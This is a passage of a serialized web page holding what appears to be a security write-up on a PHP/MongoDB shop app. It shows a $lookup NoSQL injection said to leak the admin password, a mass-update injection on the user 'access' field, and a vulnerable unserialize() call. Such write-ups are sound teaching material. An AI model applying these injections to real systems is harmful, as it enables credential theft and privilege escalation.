This",{"type":33,"tag":128,"props":40865,"children":40866},{"style":20986},[40867],{"type":38,"value":5009},{"type":33,"tag":128,"props":40869,"children":40870},{"style":20986},[40871],{"type":38,"value":4793},{"type":33,"tag":128,"props":40873,"children":40874},{"style":20986},[40875],{"type":38,"value":40876}," collection",{"type":33,"tag":128,"props":40878,"children":40879},{"style":20986},[40880],{"type":38,"value":40881}," we",{"type":33,"tag":128,"props":40883,"children":40884},{"style":20986},[40885],{"type":38,"value":40886}," want",{"type":33,"tag":128,"props":40888,"children":40889},{"style":20986},[40890],{"type":38,"value":4982},{"type":33,"tag":128,"props":40892,"children":40893},{"style":20986},[40894],{"type":38,"value":40895}," retrieve",{"type":33,"tag":128,"props":40897,"children":40898},{"style":20986},[40899],{"type":38,"value":13545},{"type":33,"tag":128,"props":40901,"children":40902},{"style":20986},[40903],{"type":38,"value":40904}," from\n",{"type":33,"tag":128,"props":40906,"children":40907},{"class":130,"line":765},[40908,40912,40917,40921,40925,40929,40934,40938,40942,40946,40950,40954,40958,40963,40967,40971,40975],{"type":33,"tag":128,"props":40909,"children":40910},{"style":656},[40911],{"type":38,"value":12707},{"type":33,"tag":128,"props":40913,"children":40914},{"style":437},[40915],{"type":38,"value":40916},"localField",{"type":33,"tag":128,"props":40918,"children":40919},{"style":656},[40920],{"type":38,"value":669},{"type":33,"tag":128,"props":40922,"children":40923},{"style":312},[40924],{"type":38,"value":284},{"type":33,"tag":128,"props":40926,"children":40927},{"style":676},[40928],{"type":38,"value":679},{"type":33,"tag":128,"props":40930,"children":40931},{"style":140},[40932],{"type":38,"value":40933},"aaaaa",{"type":33,"tag":128,"props":40935,"children":40936},{"style":676},[40937],{"type":38,"value":669},{"type":33,"tag":128,"props":40939,"children":40940},{"style":312},[40941],{"type":38,"value":5584},{"type":33,"tag":1
28,"props":40943,"children":40944},{"style":20986},[40945],{"type":38,"value":40858},{"type":33,"tag":128,"props":40947,"children":40948},{"style":20986},[40949],{"type":38,"value":40863},{"type":33,"tag":128,"props":40951,"children":40952},{"style":20986},[40953],{"type":38,"value":5009},{"type":33,"tag":128,"props":40955,"children":40956},{"style":20986},[40957],{"type":38,"value":4793},{"type":33,"tag":128,"props":40959,"children":40960},{"style":20986},[40961],{"type":38,"value":40962}," field",{"type":33,"tag":128,"props":40964,"children":40965},{"style":20986},[40966],{"type":38,"value":4788},{"type":33,"tag":128,"props":40968,"children":40969},{"style":20986},[40970],{"type":38,"value":4793},{"type":33,"tag":128,"props":40972,"children":40973},{"style":20986},[40974],{"type":38,"value":16183},{"type":33,"tag":128,"props":40976,"children":40977},{"style":20986},[40978],{"type":38,"value":40979}," collection\n",{"type":33,"tag":128,"props":40981,"children":40982},{"class":130,"line":804},[40983,40987,40992,40996,41000,41004,41008,41012,41016,41020,41024,41028,41032,41036,41041,41045,41050,41055,41059,41063,41067,41072],{"type":33,"tag":128,"props":40984,"children":40985},{"style":656},[40986],{"type":38,"value":12707},{"type":33,"tag":128,"props":40988,"children":40989},{"style":437},[40990],{"type":38,"value":40991},"foreignField",{"type":33,"tag":128,"props":40993,"children":40994},{"style":656},[40995],{"type":38,"value":669},{"type":33,"tag":128,"props":40997,"children":40998},{"style":312},[40999],{"type":38,"value":284},{"type":33,"tag":128,"props":41001,"children":41002},{"style":676},[41003],{"type":38,"value":679},{"type":33,"tag":128,"props":41005,"children":41006},{"style":140},[41007],{"type":38,"value":40933},{"type":33,"tag":128,"props":41009,"children":41010},{"style":676},[41011],{"type":38,"value":669},{"type":33,"tag":128,"props":41013,"children":41014},{"style":312},[41015],{"type":38,"value":5584},{"type":33,"tag":128,"props":41017,"children
":41018},{"style":20986},[41019],{"type":38,"value":40858},{"type":33,"tag":128,"props":41021,"children":41022},{"style":20986},[41023],{"type":38,"value":40863},{"type":33,"tag":128,"props":41025,"children":41026},{"style":20986},[41027],{"type":38,"value":5009},{"type":33,"tag":128,"props":41029,"children":41030},{"style":20986},[41031],{"type":38,"value":4793},{"type":33,"tag":128,"props":41033,"children":41034},{"style":20986},[41035],{"type":38,"value":40962},{"type":33,"tag":128,"props":41037,"children":41038},{"style":20986},[41039],{"type":38,"value":41040}," that",{"type":33,"tag":128,"props":41042,"children":41043},{"style":20986},[41044],{"type":38,"value":4793},{"type":33,"tag":128,"props":41046,"children":41047},{"style":20986},[41048],{"type":38,"value":41049}," documents",{"type":33,"tag":128,"props":41051,"children":41052},{"style":20986},[41053],{"type":38,"value":41054}," in",{"type":33,"tag":128,"props":41056,"children":41057},{"style":20986},[41058],{"type":38,"value":4793},{"type":33,"tag":128,"props":41060,"children":41061},{"style":20986},[41062],{"type":38,"value":4788},{"type":33,"tag":128,"props":41064,"children":41065},{"style":20986},[41066],{"type":38,"value":40876},{"type":33,"tag":128,"props":41068,"children":41069},{"style":20986},[41070],{"type":38,"value":41071}," must",{"type":33,"tag":128,"props":41073,"children":41074},{"style":20986},[41075],{"type":38,"value":41076}," 
match\n",{"type":33,"tag":128,"props":41078,"children":41079},{"class":130,"line":839},[41080,41084,41089,41093,41097,41101,41106,41110,41114,41118,41122,41126,41130,41134,41138,41142,41146,41150,41154,41159,41163],{"type":33,"tag":128,"props":41081,"children":41082},{"style":656},[41083],{"type":38,"value":12707},{"type":33,"tag":128,"props":41085,"children":41086},{"style":437},[41087],{"type":38,"value":41088},"as",{"type":33,"tag":128,"props":41090,"children":41091},{"style":656},[41092],{"type":38,"value":669},{"type":33,"tag":128,"props":41094,"children":41095},{"style":312},[41096],{"type":38,"value":284},{"type":33,"tag":128,"props":41098,"children":41099},{"style":676},[41100],{"type":38,"value":679},{"type":33,"tag":128,"props":41102,"children":41103},{"style":140},[41104],{"type":38,"value":41105},"adminData",{"type":33,"tag":128,"props":41107,"children":41108},{"style":676},[41109],{"type":38,"value":669},{"type":33,"tag":128,"props":41111,"children":41112},{"style":20986},[41113],{"type":38,"value":40858},{"type":33,"tag":128,"props":41115,"children":41116},{"style":20986},[41117],{"type":38,"value":40863},{"type":33,"tag":128,"props":41119,"children":41120},{"style":20986},[41121],{"type":38,"value":5009},{"type":33,"tag":128,"props":41123,"children":41124},{"style":20986},[41125],{"type":38,"value":4793},{"type":33,"tag":128,"props":41127,"children":41128},{"style":20986},[41129],{"type":38,"value":14688},{"type":33,"tag":128,"props":41131,"children":41132},{"style":20986},[41133],{"type":38,"value":15983},{"type":33,"tag":128,"props":41135,"children":41136},{"style":20986},[41137],{"type":38,"value":4793},{"type":33,"tag":128,"props":41139,"children":41140},{"style":20986},[41141],{"type":38,"value":13061},{"type":33,"tag":128,"props":41143,"children":41144},{"style":20986},[41145],{"type":38,"value":40962},{"type":33,"tag":128,"props":41147,"children":41148},{"style":20986},[41149],{"type":38,"value":41040},{"type":33,"tag":128,"props":41151,"childr
en":41152},{"style":20986},[41153],{"type":38,"value":3726},{"type":33,"tag":128,"props":41155,"children":41156},{"style":20986},[41157],{"type":38,"value":41158}," contain",{"type":33,"tag":128,"props":41160,"children":41161},{"style":20986},[41162],{"type":38,"value":4793},{"type":33,"tag":128,"props":41164,"children":41165},{"style":20986},[41166],{"type":38,"value":41167}," data\n",{"type":33,"tag":128,"props":41169,"children":41170},{"class":130,"line":848},[41171],{"type":33,"tag":128,"props":41172,"children":41173},{"style":312},[41174],{"type":38,"value":6760},{"type":33,"tag":128,"props":41176,"children":41177},{"class":130,"line":976},[41178],{"type":33,"tag":128,"props":41179,"children":41180},{"style":312},[41181],{"type":38,"value":845},{"type":33,"tag":128,"props":41183,"children":41184},{"class":130,"line":988},[41185],{"type":33,"tag":128,"props":41186,"children":41187},{"style":312},[41188],{"type":38,"value":3262},{"type":33,"tag":47,"props":41190,"children":41191},{},[41192],{"type":38,"value":41193},"If an input document does not contain the localField or the foreignField, the $lookup treats the field as having a value of null for matching purposes.",{"type":33,"tag":47,"props":41195,"children":41196},{},[41197],{"type":38,"value":41198},"This is an sql representation of the request:",{"type":33,"tag":114,"props":41200,"children":41201},{"lang":10492},[41202],{"type":33,"tag":119,"props":41203,"children":41206},{"code":41204,"language":10492,"meta":8,"className":41205,"style":8},"SELECT *, adminData\nFROM products\nWHERE adminData IN (\n   SELECT *\n   FROM users\n   WHERE null = null\n);\n","language-sql shiki shiki-themes 
vitesse-dark",[41207],{"type":33,"tag":105,"props":41208,"children":41209},{"__ignoreMap":8},[41210,41227,41239,41262,41275,41288,41309],{"type":33,"tag":128,"props":41211,"children":41212},{"class":130,"line":131},[41213,41218,41222],{"type":33,"tag":128,"props":41214,"children":41215},{"style":1576},[41216],{"type":38,"value":41217},"SELECT",{"type":33,"tag":128,"props":41219,"children":41220},{"style":300},[41221],{"type":38,"value":9826},{"type":33,"tag":128,"props":41223,"children":41224},{"style":323},[41225],{"type":38,"value":41226},", adminData\n",{"type":33,"tag":128,"props":41228,"children":41229},{"class":130,"line":362},[41230,41234],{"type":33,"tag":128,"props":41231,"children":41232},{"style":1576},[41233],{"type":38,"value":22929},{"type":33,"tag":128,"props":41235,"children":41236},{"style":323},[41237],{"type":38,"value":41238}," products\n",{"type":33,"tag":128,"props":41240,"children":41241},{"class":130,"line":403},[41242,41247,41252,41257],{"type":33,"tag":128,"props":41243,"children":41244},{"style":1576},[41245],{"type":38,"value":41246},"WHERE",{"type":33,"tag":128,"props":41248,"children":41249},{"style":323},[41250],{"type":38,"value":41251}," adminData ",{"type":33,"tag":128,"props":41253,"children":41254},{"style":1576},[41255],{"type":38,"value":41256},"IN",{"type":33,"tag":128,"props":41258,"children":41259},{"style":323},[41260],{"type":38,"value":41261}," (\n",{"type":33,"tag":128,"props":41263,"children":41264},{"class":130,"line":739},[41265,41270],{"type":33,"tag":128,"props":41266,"children":41267},{"style":1576},[41268],{"type":38,"value":41269},"   SELECT",{"type":33,"tag":128,"props":41271,"children":41272},{"style":300},[41273],{"type":38,"value":41274}," *\n",{"type":33,"tag":128,"props":41276,"children":41277},{"class":130,"line":765},[41278,41283],{"type":33,"tag":128,"props":41279,"children":41280},{"style":1576},[41281],{"type":38,"value":41282},"   
FROM",{"type":33,"tag":128,"props":41284,"children":41285},{"style":323},[41286],{"type":38,"value":41287}," users\n",{"type":33,"tag":128,"props":41289,"children":41290},{"class":130,"line":804},[41291,41296,41300,41304],{"type":33,"tag":128,"props":41292,"children":41293},{"style":1576},[41294],{"type":38,"value":41295},"   WHERE",{"type":33,"tag":128,"props":41297,"children":41298},{"style":1576},[41299],{"type":38,"value":35722},{"type":33,"tag":128,"props":41301,"children":41302},{"style":300},[41303],{"type":38,"value":5657},{"type":33,"tag":128,"props":41305,"children":41306},{"style":1576},[41307],{"type":38,"value":41308}," null\n",{"type":33,"tag":128,"props":41310,"children":41311},{"class":130,"line":839},[41312],{"type":33,"tag":128,"props":41313,"children":41314},{"style":323},[41315],{"type":38,"value":5815},{"type":33,"tag":47,"props":41317,"children":41318},{},[41319],{"type":38,"value":41320},"This allows us to retrieve the administrator's password.",{"type":33,"tag":32400,"props":41322,"children":41324},{"width":40587,"src":41323},"https://user-images.githubusercontent.com/28403617/227583798-02661604-c9b8-4e10-a47a-841e6d3e6b38.png",[],{"type":33,"tag":40,"props":41326,"children":41328},{"id":41327},"second-nosqli",[41329],{"type":38,"value":41330},"Second NoSQLI",{"type":33,"tag":47,"props":41332,"children":41333},{},[41334],{"type":38,"value":41335},"By analyzing the code, we quickly realize that a request also don't have protection.",{"type":33,"tag":114,"props":41337,"children":41338},{"lang":40629},[41339],{"type":33,"tag":119,"props":41340,"children":41342},{"code":41341,"language":40629,"meta":8,"className":40634,"style":8},"public function updateUser($data)\n{\n  return $this->database->update('users', $data['_id'], 
$data);\n}\n",[41343],{"type":33,"tag":105,"props":41344,"children":41345},{"__ignoreMap":8},[41346,41374,41381,41473],{"type":33,"tag":128,"props":41347,"children":41348},{"class":130,"line":131},[41349,41353,41357,41362,41366,41370],{"type":33,"tag":128,"props":41350,"children":41351},{"style":300},[41352],{"type":38,"value":25953},{"type":33,"tag":128,"props":41354,"children":41355},{"style":300},[41356],{"type":38,"value":15428},{"type":33,"tag":128,"props":41358,"children":41359},{"style":135},[41360],{"type":38,"value":41361}," updateUser",{"type":33,"tag":128,"props":41363,"children":41364},{"style":312},[41365],{"type":38,"value":40659},{"type":33,"tag":128,"props":41367,"children":41368},{"style":306},[41369],{"type":38,"value":2815},{"type":33,"tag":128,"props":41371,"children":41372},{"style":312},[41373],{"type":38,"value":2427},{"type":33,"tag":128,"props":41375,"children":41376},{"class":130,"line":362},[41377],{"type":33,"tag":128,"props":41378,"children":41379},{"style":312},[41380],{"type":38,"value":650},{"type":33,"tag":128,"props":41382,"children":41383},{"class":130,"line":403},[41384,41388,41392,41396,41400,41404,41408,41412,41416,41420,41424,41428,41432,41436,41440,41444,41448,41453,41457,41461,41465,41469],{"type":33,"tag":128,"props":41385,"children":41386},{"style":1576},[41387],{"type":38,"value":13056},{"type":33,"tag":128,"props":41389,"children":41390},{"style":312},[41391],{"type":38,"value":40686},{"type":33,"tag":128,"props":41393,"children":41394},{"style":151},[41395],{"type":38,"value":3721},{"type":33,"tag":128,"props":41397,"children":41398},{"style":300},[41399],{"type":38,"value":40695},{"type":33,"tag":128,"props":41401,"children":41402},{"style":306},[41403],{"type":38,"value":40700},{"type":33,"tag":128,"props":41405,"children":41406},{"style":300},[41407],{"type":38,"value":40695},{"type":33,"tag":128,"props":41409,"children":41410},{"style":135},[41411],{"type":38,"value":30219},{"type":33,"tag":128,"props":41413,"childre
n":41414},{"style":312},[41415],{"type":38,"value":5566},{"type":33,"tag":128,"props":41417,"children":41418},{"style":676},[41419],{"type":38,"value":6040},{"type":33,"tag":128,"props":41421,"children":41422},{"style":140},[41423],{"type":38,"value":30376},{"type":33,"tag":128,"props":41425,"children":41426},{"style":676},[41427],{"type":38,"value":6040},{"type":33,"tag":128,"props":41429,"children":41430},{"style":312},[41431],{"type":38,"value":5584},{"type":33,"tag":128,"props":41433,"children":41434},{"style":312},[41435],{"type":38,"value":40686},{"type":33,"tag":128,"props":41437,"children":41438},{"style":306},[41439],{"type":38,"value":2815},{"type":33,"tag":128,"props":41441,"children":41442},{"style":312},[41443],{"type":38,"value":344},{"type":33,"tag":128,"props":41445,"children":41446},{"style":676},[41447],{"type":38,"value":6040},{"type":33,"tag":128,"props":41449,"children":41450},{"style":140},[41451],{"type":38,"value":41452},"_id",{"type":33,"tag":128,"props":41454,"children":41455},{"style":676},[41456],{"type":38,"value":6040},{"type":33,"tag":128,"props":41458,"children":41459},{"style":312},[41460],{"type":38,"value":13540},{"type":33,"tag":128,"props":41462,"children":41463},{"style":312},[41464],{"type":38,"value":40686},{"type":33,"tag":128,"props":41466,"children":41467},{"style":306},[41468],{"type":38,"value":2815},{"type":33,"tag":128,"props":41470,"children":41471},{"style":312},[41472],{"type":38,"value":5815},{"type":33,"tag":128,"props":41474,"children":41475},{"class":130,"line":739},[41476],{"type":33,"tag":128,"props":41477,"children":41478},{"style":312},[41479],{"type":38,"value":854},{"type":33,"tag":47,"props":41481,"children":41482},{},[41483],{"type":38,"value":41484},"In this function we control the data parameter. 
Therefore, we can see that it is possible to update an entire user, including their access element.\nThis access element is a serialized array, so it is obvious that at some point in the application this element will be deserialized.",{"type":33,"tag":47,"props":41486,"children":41487},{},[41488],{"type":38,"value":41489},"A user in database have this structure:",{"type":33,"tag":114,"props":41491,"children":41492},{"lang":633},[41493],{"type":33,"tag":119,"props":41494,"children":41496},{"code":41495,"language":633,"meta":8,"className":637,"style":8},"{\n    \"_id\": 1,\n    \"username\": \"admin\",\n    \"password\": \"[REDACTED]\",\n    \"access\": \"a:4:{s:9:\\\"Dashboard\\\";b:1;s:7:\\\"Product\\\";b:1;s:5:\\\"Order\\\";b:1;s:4:\\\"User\\\";b:1;}\"\n}\n",[41497],{"type":33,"tag":105,"props":41498,"children":41499},{"__ignoreMap":8},[41500,41507,41534,41570,41606,41711],{"type":33,"tag":128,"props":41501,"children":41502},{"class":130,"line":131},[41503],{"type":33,"tag":128,"props":41504,"children":41505},{"style":312},[41506],{"type":38,"value":650},{"type":33,"tag":128,"props":41508,"children":41509},{"class":130,"line":362},[41510,41514,41518,41522,41526,41530],{"type":33,"tag":128,"props":41511,"children":41512},{"style":656},[41513],{"type":38,"value":771},{"type":33,"tag":128,"props":41515,"children":41516},{"style":437},[41517],{"type":38,"value":41452},{"type":33,"tag":128,"props":41519,"children":41520},{"style":656},[41521],{"type":38,"value":669},{"type":33,"tag":128,"props":41523,"children":41524},{"style":312},[41525],{"type":38,"value":284},{"type":33,"tag":128,"props":41527,"children":41528},{"style":523},[41529],{"type":38,"value":9774},{"type":33,"tag":128,"props":41531,"children":41532},{"style":312},[41533],{"type":38,"value":693},{"type":33,"tag":128,"props":41535,"children":41536},{"class":130,"line":403},[41537,41541,41545,41549,41553,41557,41562,41566],{"type":33,"tag":128,"props":41538,"children":41539},{"style":656},[41540],{"type":38,"
value":771},{"type":33,"tag":128,"props":41542,"children":41543},{"style":437},[41544],{"type":38,"value":29798},{"type":33,"tag":128,"props":41546,"children":41547},{"style":656},[41548],{"type":38,"value":669},{"type":33,"tag":128,"props":41550,"children":41551},{"style":312},[41552],{"type":38,"value":284},{"type":33,"tag":128,"props":41554,"children":41555},{"style":676},[41556],{"type":38,"value":679},{"type":33,"tag":128,"props":41558,"children":41559},{"style":140},[41560],{"type":38,"value":41561},"admin",{"type":33,"tag":128,"props":41563,"children":41564},{"style":676},[41565],{"type":38,"value":669},{"type":33,"tag":128,"props":41567,"children":41568},{"style":312},[41569],{"type":38,"value":693},{"type":33,"tag":128,"props":41571,"children":41572},{"class":130,"line":739},[41573,41577,41582,41586,41590,41594,41598,41602],{"type":33,"tag":128,"props":41574,"children":41575},{"style":656},[41576],{"type":38,"value":771},{"type":33,"tag":128,"props":41578,"children":41579},{"style":437},[41580],{"type":38,"value":41581},"password",{"type":33,"tag":128,"props":41583,"children":41584},{"style":656},[41585],{"type":38,"value":669},{"type":33,"tag":128,"props":41587,"children":41588},{"style":312},[41589],{"type":38,"value":284},{"type":33,"tag":128,"props":41591,"children":41592},{"style":676},[41593],{"type":38,"value":679},{"type":33,"tag":128,"props":41595,"children":41596},{"style":140},[41597],{"type":38,"value":9628},{"type":33,"tag":128,"props":41599,"children":41600},{"style":676},[41601],{"type":38,"value":669},{"type":33,"tag":128,"props":41603,"children":41604},{"style":312},[41605],{"type":38,"value":693},{"type":33,"tag":128,"props":41607,"children":41608},{"class":130,"line":765},[41609,41613,41618,41622,41626,41630,41635,41639,41644,41648,41653,41657,41662,41666,41671,41675,41680,41684,41689,41693,41698,41702,41707],{"type":33,"tag":128,"props":41610,"children":41611},{"style":656},[41612],{"type":38,"value":771},{"type":33,"tag":128,"props":416
14,"children":41615},{"style":437},[41616],{"type":38,"value":41617},"access",{"type":33,"tag":128,"props":41619,"children":41620},{"style":656},[41621],{"type":38,"value":669},{"type":33,"tag":128,"props":41623,"children":41624},{"style":312},[41625],{"type":38,"value":284},{"type":33,"tag":128,"props":41627,"children":41628},{"style":676},[41629],{"type":38,"value":679},{"type":33,"tag":128,"props":41631,"children":41632},{"style":140},[41633],{"type":38,"value":41634},"a:4:{s:9:",{"type":33,"tag":128,"props":41636,"children":41637},{"style":151},[41638],{"type":38,"value":10544},{"type":33,"tag":128,"props":41640,"children":41641},{"style":140},[41642],{"type":38,"value":41643},"Dashboard",{"type":33,"tag":128,"props":41645,"children":41646},{"style":151},[41647],{"type":38,"value":10544},{"type":33,"tag":128,"props":41649,"children":41650},{"style":140},[41651],{"type":38,"value":41652},";b:1;s:7:",{"type":33,"tag":128,"props":41654,"children":41655},{"style":151},[41656],{"type":38,"value":10544},{"type":33,"tag":128,"props":41658,"children":41659},{"style":140},[41660],{"type":38,"value":41661},"Product",{"type":33,"tag":128,"props":41663,"children":41664},{"style":151},[41665],{"type":38,"value":10544},{"type":33,"tag":128,"props":41667,"children":41668},{"style":140},[41669],{"type":38,"value":41670},";b:1;s:5:",{"type":33,"tag":128,"props":41672,"children":41673},{"style":151},[41674],{"type":38,"value":10544},{"type":33,"tag":128,"props":41676,"children":41677},{"style":140},[41678],{"type":38,"value":41679},"Order",{"type":33,"tag":128,"props":41681,"children":41682},{"style":151},[41683],{"type":38,"value":10544},{"type":33,"tag":128,"props":41685,"children":41686},{"style":140},[41687],{"type":38,"value":41688},";b:1;s:4:",{"type":33,"tag":128,"props":41690,"children":41691},{"style":151},[41692],{"type":38,"value":10544},{"type":33,"tag":128,"props":41694,"children":41695},{"style":140},[41696],{"type":38,"value":41697},"User",{"type":33,"tag":128,"pro
ps":41699,"children":41700},{"style":151},[41701],{"type":38,"value":10544},{"type":33,"tag":128,"props":41703,"children":41704},{"style":140},[41705],{"type":38,"value":41706},";b:1;}",{"type":33,"tag":128,"props":41708,"children":41709},{"style":676},[41710],{"type":38,"value":836},{"type":33,"tag":128,"props":41712,"children":41713},{"class":130,"line":804},[41714],{"type":33,"tag":128,"props":41715,"children":41716},{"style":312},[41717],{"type":38,"value":854},{"type":33,"tag":47,"props":41719,"children":41720},{},[41721],{"type":38,"value":41722},"The access element is used to determine the user's access rights, on the back office.",{"type":33,"tag":47,"props":41724,"children":41725},{},[41726],{"type":38,"value":41727},"We can see that deserialization is not protected and is therefore susceptible to be exploited.",{"type":33,"tag":114,"props":41729,"children":41730},{"lang":40629},[41731],{"type":33,"tag":119,"props":41732,"children":41734},{"code":41733,"language":40629,"meta":8,"className":40634,"style":8},"\u003C?php\nclass UserModel extends Model\n{\n  public function __construct()\n  {\n    parent::__construct();\n    $this->username = $_SESSION['username'] ?? '';\n    $this->email    = $_SESSION['email'] ?? '';\n    $this->access   = unserialize($_SESSION['access'] ?? 
''); // This line is vulnerable\n  }\n  ...\n",[41735],{"type":33,"tag":105,"props":41736,"children":41737},{"__ignoreMap":8},[41738,41751,41773,41780,41801,41808,41825,41891,41955,42029,42036],{"type":33,"tag":128,"props":41739,"children":41740},{"class":130,"line":131},[41741,41746],{"type":33,"tag":128,"props":41742,"children":41743},{"style":300},[41744],{"type":38,"value":41745},"\u003C?",{"type":33,"tag":128,"props":41747,"children":41748},{"style":151},[41749],{"type":38,"value":41750},"php\n",{"type":33,"tag":128,"props":41752,"children":41753},{"class":130,"line":362},[41754,41758,41763,41768],{"type":33,"tag":128,"props":41755,"children":41756},{"style":300},[41757],{"type":38,"value":30336},{"type":33,"tag":128,"props":41759,"children":41760},{"style":30339},[41761],{"type":38,"value":41762}," UserModel",{"type":33,"tag":128,"props":41764,"children":41765},{"style":300},[41766],{"type":38,"value":41767}," extends",{"type":33,"tag":128,"props":41769,"children":41770},{"style":135},[41771],{"type":38,"value":41772}," Model\n",{"type":33,"tag":128,"props":41774,"children":41775},{"class":130,"line":403},[41776],{"type":33,"tag":128,"props":41777,"children":41778},{"style":312},[41779],{"type":38,"value":650},{"type":33,"tag":128,"props":41781,"children":41782},{"class":130,"line":739},[41783,41788,41792,41797],{"type":33,"tag":128,"props":41784,"children":41785},{"style":300},[41786],{"type":38,"value":41787},"  public",{"type":33,"tag":128,"props":41789,"children":41790},{"style":300},[41791],{"type":38,"value":15428},{"type":33,"tag":128,"props":41793,"children":41794},{"style":437},[41795],{"type":38,"value":41796}," 
__construct",{"type":33,"tag":128,"props":41798,"children":41799},{"style":312},[41800],{"type":38,"value":7857},{"type":33,"tag":128,"props":41802,"children":41803},{"class":130,"line":765},[41804],{"type":33,"tag":128,"props":41805,"children":41806},{"style":312},[41807],{"type":38,"value":40795},{"type":33,"tag":128,"props":41809,"children":41810},{"class":130,"line":804},[41811,41816,41821],{"type":33,"tag":128,"props":41812,"children":41813},{"style":300},[41814],{"type":38,"value":41815},"    parent::",{"type":33,"tag":128,"props":41817,"children":41818},{"style":135},[41819],{"type":38,"value":41820},"__construct",{"type":33,"tag":128,"props":41822,"children":41823},{"style":312},[41824],{"type":38,"value":15496},{"type":33,"tag":128,"props":41826,"children":41827},{"class":130,"line":839},[41828,41833,41837,41841,41845,41849,41853,41858,41862,41866,41870,41874,41878,41882,41887],{"type":33,"tag":128,"props":41829,"children":41830},{"style":312},[41831],{"type":38,"value":41832},"    
$",{"type":33,"tag":128,"props":41834,"children":41835},{"style":151},[41836],{"type":38,"value":3721},{"type":33,"tag":128,"props":41838,"children":41839},{"style":300},[41840],{"type":38,"value":40695},{"type":33,"tag":128,"props":41842,"children":41843},{"style":306},[41844],{"type":38,"value":29798},{"type":33,"tag":128,"props":41846,"children":41847},{"style":312},[41848],{"type":38,"value":5657},{"type":33,"tag":128,"props":41850,"children":41851},{"style":312},[41852],{"type":38,"value":40686},{"type":33,"tag":128,"props":41854,"children":41855},{"style":306},[41856],{"type":38,"value":41857},"_SESSION",{"type":33,"tag":128,"props":41859,"children":41860},{"style":312},[41861],{"type":38,"value":344},{"type":33,"tag":128,"props":41863,"children":41864},{"style":676},[41865],{"type":38,"value":6040},{"type":33,"tag":128,"props":41867,"children":41868},{"style":140},[41869],{"type":38,"value":29798},{"type":33,"tag":128,"props":41871,"children":41872},{"style":676},[41873],{"type":38,"value":6040},{"type":33,"tag":128,"props":41875,"children":41876},{"style":312},[41877],{"type":38,"value":354},{"type":33,"tag":128,"props":41879,"children":41880},{"style":300},[41881],{"type":38,"value":13931},{"type":33,"tag":128,"props":41883,"children":41884},{"style":676},[41885],{"type":38,"value":41886}," 
''",{"type":33,"tag":128,"props":41888,"children":41889},{"style":312},[41890],{"type":38,"value":5676},{"type":33,"tag":128,"props":41892,"children":41893},{"class":130,"line":848},[41894,41898,41902,41906,41910,41915,41919,41923,41927,41931,41935,41939,41943,41947,41951],{"type":33,"tag":128,"props":41895,"children":41896},{"style":312},[41897],{"type":38,"value":41832},{"type":33,"tag":128,"props":41899,"children":41900},{"style":151},[41901],{"type":38,"value":3721},{"type":33,"tag":128,"props":41903,"children":41904},{"style":300},[41905],{"type":38,"value":40695},{"type":33,"tag":128,"props":41907,"children":41908},{"style":306},[41909],{"type":38,"value":29866},{"type":33,"tag":128,"props":41911,"children":41912},{"style":312},[41913],{"type":38,"value":41914},"    =",{"type":33,"tag":128,"props":41916,"children":41917},{"style":312},[41918],{"type":38,"value":40686},{"type":33,"tag":128,"props":41920,"children":41921},{"style":306},[41922],{"type":38,"value":41857},{"type":33,"tag":128,"props":41924,"children":41925},{"style":312},[41926],{"type":38,"value":344},{"type":33,"tag":128,"props":41928,"children":41929},{"style":676},[41930],{"type":38,"value":6040},{"type":33,"tag":128,"props":41932,"children":41933},{"style":140},[41934],{"type":38,"value":29866},{"type":33,"tag":128,"props":41936,"children":41937},{"style":676},[41938],{"type":38,"value":6040},{"type":33,"tag":128,"props":41940,"children":41941},{"style":312},[41942],{"type":38,"value":354},{"type":33,"tag":128,"props":41944,"children":41945},{"style":300},[41946],{"type":38,"value":13931},{"type":33,"tag":128,"props":41948,"children":41949},{"style":676},[41950],{"type":38,"value":41886},{"type":33,"tag":128,"props":41952,"children":41953},{"style":312},[41954],{"type":38,"value":5676},{"type":33,"tag":128,"props":41956,"children":41957},{"class":130,"line":976},[41958,41962,41966,41970,41974,41979,41984,41988,41992,41996,42000,42004,42008,42012,42016,42020,42024],{"type":33,"tag":128,"props":
41959,"children":41960},{"style":312},[41961],{"type":38,"value":41832},{"type":33,"tag":128,"props":41963,"children":41964},{"style":151},[41965],{"type":38,"value":3721},{"type":33,"tag":128,"props":41967,"children":41968},{"style":300},[41969],{"type":38,"value":40695},{"type":33,"tag":128,"props":41971,"children":41972},{"style":306},[41973],{"type":38,"value":41617},{"type":33,"tag":128,"props":41975,"children":41976},{"style":312},[41977],{"type":38,"value":41978},"   =",{"type":33,"tag":128,"props":41980,"children":41981},{"style":437},[41982],{"type":38,"value":41983}," unserialize",{"type":33,"tag":128,"props":41985,"children":41986},{"style":312},[41987],{"type":38,"value":40659},{"type":33,"tag":128,"props":41989,"children":41990},{"style":306},[41991],{"type":38,"value":41857},{"type":33,"tag":128,"props":41993,"children":41994},{"style":312},[41995],{"type":38,"value":344},{"type":33,"tag":128,"props":41997,"children":41998},{"style":676},[41999],{"type":38,"value":6040},{"type":33,"tag":128,"props":42001,"children":42002},{"style":140},[42003],{"type":38,"value":41617},{"type":33,"tag":128,"props":42005,"children":42006},{"style":676},[42007],{"type":38,"value":6040},{"type":33,"tag":128,"props":42009,"children":42010},{"style":312},[42011],{"type":38,"value":354},{"type":33,"tag":128,"props":42013,"children":42014},{"style":300},[42015],{"type":38,"value":13931},{"type":33,"tag":128,"props":42017,"children":42018},{"style":676},[42019],{"type":38,"value":41886},{"type":33,"tag":128,"props":42021,"children":42022},{"style":312},[42023],{"type":38,"value":27256},{"type":33,"tag":128,"props":42025,"children":42026},{"style":5541},[42027],{"type":38,"value":42028}," // This line is 
vulnerable\n",{"type":33,"tag":128,"props":42030,"children":42031},{"class":130,"line":988},[42032],{"type":33,"tag":128,"props":42033,"children":42034},{"style":312},[42035],{"type":38,"value":845},{"type":33,"tag":128,"props":42037,"children":42038},{"class":130,"line":1001},[42039],{"type":33,"tag":128,"props":42040,"children":42041},{"style":312},[42042],{"type":38,"value":42043},"  ...\n",{"type":33,"tag":47,"props":42045,"children":42046},{},[42047],{"type":33,"tag":2302,"props":42048,"children":42049},{},[42050],{"type":38,"value":42051},"What is serialization?",{"type":33,"tag":47,"props":42053,"children":42054},{},[42055],{"type":38,"value":42056},"In PHP, serialization is the process of converting a PHP object or data structure into a format that can be easily stored or transmitted. The serialized data can be stored in a file, database, or sent over a network. The serialized data can then be later retrieved and unserialized, which is the process of converting the serialized data back into its original PHP object or data 